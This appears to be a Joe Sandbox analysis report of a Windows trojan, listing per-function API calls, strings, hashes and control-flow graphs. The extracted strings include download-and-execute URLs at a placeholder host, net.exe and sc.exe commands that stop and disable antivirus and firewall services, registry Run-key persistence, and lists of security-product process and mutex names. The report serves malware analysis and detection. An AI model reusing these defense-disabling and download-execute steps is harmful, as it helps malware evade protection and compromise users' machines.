                                                                            Similarity
                                                                            • API ID: FileSleep$CopyDirectoryDownloadExecuteShellWindows
                                                                            • String ID: bbyb.exe$bbybs.exe$http://www.xxx.com/abc.exe$open
                                                                            • API String ID: 1899506612-3830082169
                                                                            • Opcode ID: 74dddda8ba28423a3b8d1139dc2664c01dbdf4c90ccd245ff7deac2de5b3cde6
                                                                            • Instruction ID: bc9fdd56434a3f6b10c0c995d718bd545f813c534919513bdb7c3ec1913c9215
                                                                            • Opcode Fuzzy Hash: 74dddda8ba28423a3b8d1139dc2664c01dbdf4c90ccd245ff7deac2de5b3cde6
                                                                            • Instruction Fuzzy Hash: A231F170A442096BD700FBA5D942BAE7BBDEF44709F50407BB500B76D2DB78BE00866E
                                                                            Function 004080C8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64filenetworkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 0040810F
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,0040819E,?,00000000,00000000,?,004084B1,?,00000000,?,004084C7,000493E0), ref: 00408132
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00408168
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 0040817E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$CacheEntryFile$DirectoryDownloadWindows
                                                                            • String ID: bbyb.dll$http://www.xxx.com/qqmsg.txt
                                                                            • API String ID: 2436712417-1998065829
                                                                            • Opcode ID: 3ddb6b2395be871ddeea2fb3607101ab18d3a0cfe0804a7c7e3355ca6e5b914b
                                                                            • Instruction ID: fb79d00d57ea562a78b15d8b1474b2916bd554e92aef79f5ae6ec560df59828f
                                                                            • Opcode Fuzzy Hash: 3ddb6b2395be871ddeea2fb3607101ab18d3a0cfe0804a7c7e3355ca6e5b914b
                                                                            • Instruction Fuzzy Hash: DF11FC70614204AFD700FB65CE42B9A7BBDEF45705F50407AF944BB6E2CB78AE058A6C
                                                                            Function 00404C8C Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,00404CFE,?,00407C46,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404CA7
                                                                            • FindClose.KERNEL32(00000000,00000000,?,?,?,00404CFE,?,00407C46,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404CB2
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00404CCB
                                                                            • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 00404CDC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: FileTime$Find$CloseDateFirstLocal
                                                                            • String ID:
                                                                            • API String ID: 2659516521-0
                                                                            • Opcode ID: e19ef94f2e6e2a907a38945001cbfa430e33e270dcde4c1a02f6c12d7a16949f
                                                                            • Instruction ID: 5eb690258a486c73d36cab68f814cc2b6737afb4a969db669cbaf41a67b5cd0e
                                                                            • Opcode Fuzzy Hash: e19ef94f2e6e2a907a38945001cbfa430e33e270dcde4c1a02f6c12d7a16949f
                                                                            • Instruction Fuzzy Hash: F0F0A4B5D0520C66CB10EAE68D859CF73AC5F45314F5006F7B615F21D1E738DB444754
                                                                            Function 004047BC Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404540: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004047C7,00000000,?,004048B9,00000000,004049BC,?,?,?,?,?,00407553,00000320,00000000), ref: 00404554
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040456C
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0040457E
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404590
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004045A2
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004045B4
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004045C6
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004045D8
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004045EA
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004045FC
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0040460E
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404620
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404632
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404644
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404656
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404668
                                                                              • Part of subcall function 00404540: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0040467A
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004047CD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 2242398760-0
                                                                            • Opcode ID: fad7533437dbae3efdf639f17d82456d4a1287e93aada96dda02112028223706
                                                                            • Instruction ID: c40cfb2cff0e8543d494dcdfcbf93d461de1da01fd97da5991265f8cc755c822
                                                                            • Opcode Fuzzy Hash: fad7533437dbae3efdf639f17d82456d4a1287e93aada96dda02112028223706
                                                                            • Instruction Fuzzy Hash: EFC012A261122017CA1066F52C844C3579CC9891FA31404B3B704E7141E2398C105294
                                                                            Function 00406928 Relevance: .2, Instructions: 202COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7177dfe09ef4ef988a2f4ce694f4589d817de3211fee15f6d50f853410cb63ed
                                                                            • Instruction ID: 9b54f791db319941aeffdd1efb0013a4bd3e1cb590ed9f6d5a4233f3242aa329
                                                                            • Opcode Fuzzy Hash: 7177dfe09ef4ef988a2f4ce694f4589d817de3211fee15f6d50f853410cb63ed
                                                                            • Instruction Fuzzy Hash: 088181346001598BCB10EF29CD899DEB7F5AF84308F10C1FAA048F7292DE74AE458F48
                                                                            Function 00439FF4 Relevance: .0, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d1fa593c62158223b1756ff7cb23789419df856db7ac206db492079f68264a68
                                                                            • Instruction ID: 1bade6449aabee190caab60189d6dc675293c1afc907f810e7c367bfa3899723
                                                                            • Opcode Fuzzy Hash: d1fa593c62158223b1756ff7cb23789419df856db7ac206db492079f68264a68
                                                                            • Instruction Fuzzy Hash: 65F0B2254C06808ACA2FFF72850231C62319F6C708F04682FF3854A532DA2F4425855B
                                                                            Function 004072AC Relevance: 129.8, APIs: 21, Strings: 53, Instructions: 296sleepfilewindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • Sleep.KERNEL32(0000012C,00000000,0040775D,?,00000003,00000000,00000000), ref: 004073A8
                                                                            • ShellExecuteA.SHELL32(00000000,open,regedit.exe,00000000,noruns.reg,?), ref: 004073E8
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop sharedaccess,00000000,00000000), ref: 00407402
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop KVWSC,00000000,00000000), ref: 0040741C
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config KVWSC start= disabled,00000000,00000000), ref: 00407436
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop KVSrvXP,00000000,00000000), ref: 00407450
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config KVSrvXP start= disabled,00000000,00000000), ref: 0040746A
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop kavsvc,00000000,00000000), ref: 00407484
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config kavsvc start= disabled,00000000,00000000), ref: 0040749E
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config RsRavMon start= disabled,00000000,00000000), ref: 004074B8
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop RsCCenter,00000000,00000000), ref: 004074D2
                                                                            • ShellExecuteA.SHELL32(00000000,open,sc.exe,config RsCCenter start= disabled,00000000,00000000), ref: 004074EC
                                                                            • ShellExecuteA.SHELL32(00000000,open,net.exe,stop RsRavMon,00000000,00000000), ref: 00407506
                                                                            • Sleep.KERNEL32(00000320,00000000,open,net.exe,stop RsRavMon,00000000,00000000,00000000,open,sc.exe,config RsCCenter start= disabled,00000000,00000000,00000000,open,net.exe), ref: 00407510
                                                                            • FindWindowA.USER32(#32770,00407944), ref: 0040751F
                                                                            • FindWindowExA.USER32(00000000,00000000,Button,00407958), ref: 00407531
                                                                            • SendMessageA.USER32(00000000,000000F5,00000000,00000000), ref: 00407544
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000320,00000000,open,net.exe,stop RsRavMon,00000000,00000000,00000000,open,sc.exe,config RsCCenter start= disabled,00000000,00000000,00000000), ref: 00407681
                                                                            • DeleteFileA.KERNEL32(00000000,00000001,00000000,00000000,00000006,00000320,00000000,open,net.exe,stop RsRavMon,00000000,00000000,00000000,open,sc.exe,config RsCCenter start= disabled), ref: 004076D8
                                                                            • Sleep.KERNEL32(00001770,00000000,0040775D,?,00000003,00000000,00000000), ref: 004076E4
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00001770,00000000,0040775D,?,00000003,00000000,00000000), ref: 00407709
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ExecuteShell$FileSleep$AttributesFindWindow$CloseDeleteDirectoryMessageSendValueWindows
                                                                            • String ID: /s $"NoDriveTypeAutoRun"=dword:bd$#32770$Button$CCenter.exe$EGHOST.exe$KVCenter.kxp$KVMonXP.exe$KVSrvXp_1.exe$Kav.exe$KavPFW.exe$KpopMon.exe$Kvsrvxp.exe$Microsoft$Nvsvc32.exe$PFW.exe$RAVMON.exe$RAVTIMER.exe$REGEDIT4$RRfwMain.exe$RavMonD.exe$RavService.exe$RfwMain.exe$Rtvscan.exe$Software\Microsoft\Windows\CurrentVersion\Run$VPTray.exe$[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]$config KVSrvXP start= disabled$config KVWSC start= disabled$config RsCCenter start= disabled$config RsRavMon start= disabled$config kavsvc start= disabled$kav32.exe$kavstart.exe$kavsvc.exe$kvwsc.exe$net.exe$net.exe$net1.exe$noruns.reg$open$regedit.exe$regedit.exe$sc.exe$sc.exe$sc1.exe$stop KVSrvXP$stop KVWSC$stop RsCCenter$stop RsRavMon$stop kavsvc$stop sharedaccess$wuauclt.exe
                                                                            • API String ID: 4147674485-668396500
                                                                            • Opcode ID: 122e0926d8b91529060f292cd892ad0493ca3b46db7fb0a121436a056a01876a
                                                                            • Instruction ID: ad58a2a6b321d20f2a5f7c4230813dddbb1cdd15f012d9e1a88ffbed65f06cfb
                                                                            • Opcode Fuzzy Hash: 122e0926d8b91529060f292cd892ad0493ca3b46db7fb0a121436a056a01876a
                                                                            • Instruction Fuzzy Hash: A6A10DB5F8828526D700B7A68C47F5E75649B84B09F20C47BB7147A2C3CABCB944867F
                                                                            Function 00406F74 Relevance: 68.5, APIs: 33, Strings: 6, Instructions: 237windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 154 406f74-406fa9 GetDesktopWindow 155 406fab-406fdf FindWindowExA GetWindowTextA call 403b3c call 403e2c 154->155 160 406fe1-406fe8 PostMessageA 155->160 161 406fed-406fef 155->161 160->161 161->155 162 406ff1-406ff6 GetDesktopWindow 161->162 163 406ff8-40702c FindWindowExA GetWindowTextA call 403b3c call 403e2c 162->163 168 40703a-40703c 163->168 169 40702e-407035 PostMessageA 163->169 168->163 170 40703e-407043 GetDesktopWindow 168->170 169->168 171 407045-407079 FindWindowExA GetWindowTextA call 403b3c call 403e2c 170->171 176 407087-407089 171->176 177 40707b-407082 PostMessageA 171->177 176->171 178 40708b-407090 GetDesktopWindow 176->178 177->176 179 407092-4070c6 FindWindowExA GetWindowTextA call 403b3c call 403e2c 178->179 184 4070d4-4070d6 179->184 185 4070c8-4070cf PostMessageA 179->185 184->179 186 4070d8-4070dd GetDesktopWindow 184->186 185->184 187 4070df-407113 FindWindowExA GetWindowTextA call 403b3c call 403e2c 186->187 192 407121-407123 187->192 193 407115-40711c PostMessageA 187->193 192->187 194 407125-40712a GetDesktopWindow 192->194 193->192 195 40712c-407160 FindWindowExA GetWindowTextA call 403b3c call 403e2c 194->195 200 407162-407169 PostMessageA 195->200 201 40716e-407170 195->201 200->201 201->195 202 407172-407180 FindWindowA 201->202 203 407182-407195 FindWindowA PostMessageA 202->203 204 40719a-4071a8 FindWindowA 202->204 203->204 205 4071c2-4071d3 FindWindowA 204->205 206 4071aa-4071bd FindWindowA PostMessageA 204->206 207 4071f0-40720a call 4039f4 205->207 208 4071d5-4071eb FindWindowA PostMessageA 205->208 206->205 208->207
                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 00406FA4
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00406FB1
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 00406FBC
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00406FE8
                                                                            • GetDesktopWindow.USER32 ref: 00406FF1
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00406FFE
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 00407009
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00407035
                                                                            • GetDesktopWindow.USER32 ref: 0040703E
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 0040704B
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 00407056
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00407082
                                                                            • GetDesktopWindow.USER32 ref: 0040708B
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00407098
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 004070A3
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 004070CF
                                                                            • GetDesktopWindow.USER32 ref: 004070D8
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 004070E5
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 004070F0
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 0040711C
                                                                            • GetDesktopWindow.USER32 ref: 00407125
                                                                            • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 00407132
                                                                            • GetWindowTextA.USER32(00000000,?,00000065), ref: 0040713D
                                                                            • PostMessageA.USER32(00000000,00000012,00000000,00000000), ref: 00407169
                                                                            • FindWindowA.USER32(TKillqqvir,00000000), ref: 00407179
                                                                            • FindWindowA.USER32(TKillqqvir,00000000), ref: 0040718F
                                                                            • PostMessageA.USER32(00000000,TKillqqvir,00000000,00000012), ref: 00407195
                                                                            • FindWindowA.USER32(TKqqviru,00000000), ref: 004071A1
                                                                            • FindWindowA.USER32(TKqqviru,00000000), ref: 004071B7
                                                                            • PostMessageA.USER32(00000000,TKqqviru,00000000,00000012), ref: 004071BD
                                                                            • FindWindowA.USER32(TApplication,qqav), ref: 004071CC
                                                                            • FindWindowA.USER32(TApplication,qqav), ref: 004071E5
                                                                            • PostMessageA.USER32(00000000,TApplication,qqav,00000012), ref: 004071EB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Find$MessagePost$DesktopText
                                                                            • String ID: QQAV$QQKav$TApplication$TKillqqvir$TKqqviru$qqav
                                                                            • API String ID: 2345741875-3628034782
                                                                            • Opcode ID: 2752b8e2637b6a2b4cba271e1026fffa52fd9ce12dfe85074699589a26517922
                                                                            • Instruction ID: f35ba248066b91e113d1cf3b3e48b889a6c1fe840748cfa81e74fa6914067d70
                                                                            • Opcode Fuzzy Hash: 2752b8e2637b6a2b4cba271e1026fffa52fd9ce12dfe85074699589a26517922
                                                                            • Instruction Fuzzy Hash: 7C610DB0B8434466E620B6B24D83F5E656D9F94B08F20617FBF00BA2C3D9BCAD11456D
                                                                            Function 0040854E Relevance: 49.2, APIs: 7, Strings: 21, Instructions: 188threadfileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteFileA.KERNEL32(00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00408625
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 0040867F
                                                                              • Part of subcall function 00404B70: RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 00404BAB
                                                                              • Part of subcall function 00404B70: RegDeleteValueA.ADVAPI32(?,00000000,00000000,00404BF0), ref: 00404BC7
                                                                              • Part of subcall function 00404B70: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00404BF0), ref: 00404BD0
                                                                              • Part of subcall function 00404D98: GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00408763,00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00404DBD
                                                                              • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007BEC,00000000,00000000,0040A778), ref: 00408780
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000072AC,00000000,00000000,0040A77C), ref: 00408798
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007DD0,00000000,00000000,0040A780), ref: 004087B0
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007F54,00000000,00000000,0040A784), ref: 004087C8
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000084B8,00000000,00000000,0040A788), ref: 004087E0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CreateThread$DeleteFile$CloseConnectedInternetModuleNameOpenStateValue
                                                                            • String ID: ASSISTSHELLMUTEX$AntiTrojan3721$JQbkgu$JQbkgu(f|`$KAVPersonal50$KingsoftAntivirusScanProgram7Mutex$KvMonXP$Microsoft$RavTask$SKYNET_PERSONAL_FIREWALL$Slhkk}r$Software\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$WSEKK]R-A]C$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$YLive.exe$`tn{*q~w$kakatool.dll$l}+2$wuauclt.exe$yassistse
                                                                            • API String ID: 1871698649-3763132952
                                                                            • Opcode ID: 7fa1bdf61dc4ff95cf5125529cc28d12645d26f519da0778e5b22792c792acde
                                                                            • Instruction ID: 6a7de7b5178300d5e0790259bd21792f98359187be932f6565a32f3e00f96a55
                                                                            • Opcode Fuzzy Hash: 7fa1bdf61dc4ff95cf5125529cc28d12645d26f519da0778e5b22792c792acde
                                                                            • Instruction Fuzzy Hash: 175143B07442056BD700F7A69D03FAE76699F84708F60853FB6547B2D2CEBCAD0046AD
                                                                            Function 00408550 Relevance: 49.2, APIs: 7, Strings: 21, Instructions: 187threadfileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteFileA.KERNEL32(00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00408625
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 0040867F
                                                                              • Part of subcall function 00404B70: RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 00404BAB
                                                                              • Part of subcall function 00404B70: RegDeleteValueA.ADVAPI32(?,00000000,00000000,00404BF0), ref: 00404BC7
                                                                              • Part of subcall function 00404B70: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00404BF0), ref: 00404BD0
                                                                              • Part of subcall function 00404D98: GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00408763,00000000,00000000,00000001,00000000,?,00000000,00408800,?,00000004,00000000,00000000), ref: 00404DBD
                                                                              • Part of subcall function 00408494: InternetGetConnectedState.WININET(?,00000000), ref: 004084A3
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007BEC,00000000,00000000,0040A778), ref: 00408780
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000072AC,00000000,00000000,0040A77C), ref: 00408798
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007DD0,00000000,00000000,0040A780), ref: 004087B0
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00007F54,00000000,00000000,0040A784), ref: 004087C8
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000084B8,00000000,00000000,0040A788), ref: 004087E0
                                                                            Strings
                                                                            Memory Dump Source
